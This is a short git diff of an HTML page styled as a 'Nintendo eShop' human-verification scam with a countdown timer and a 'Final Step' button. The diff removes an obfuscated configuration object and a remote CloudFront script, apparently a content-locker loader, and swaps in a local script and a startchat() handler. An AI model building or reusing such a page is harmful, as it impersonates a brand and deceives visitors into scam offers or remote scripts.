--- a/index.html
+++ b/index.html
@@ -2,10 +2,7 @@
 <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
 	
 <head>
-<script type="text/javascript">
-    var asHKr_Vox_oteXec={"it":4451820,"key":"cb9a8"};
-</script>
-<script src="https://d29gqhzevia104.cloudfront.net/4a12ab4.js"></script>
+  <script src="script.js"></script>
 		<title>Nintendo eShop
 		</title>
 		<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
@@ -44,7 +41,7 @@
 						<span id="human_verification_timer_time"><span>5 minutes and 00 seconds</span></span>
 					</div>
 					<div class="button-wrapper">
-						<a onclick="_Ht()"><div id="b-1" class="button animated pulse infinite"><span class="lnr -download"></span><span>Final Step&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span></div></a>
+						<a onclick="startchat()"><div id="b-1" class="button animated pulse infinite"><span class="lnr -download"></span><span>Final Step&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span></div></a>
 					</div>
 				</div>
 			</div>
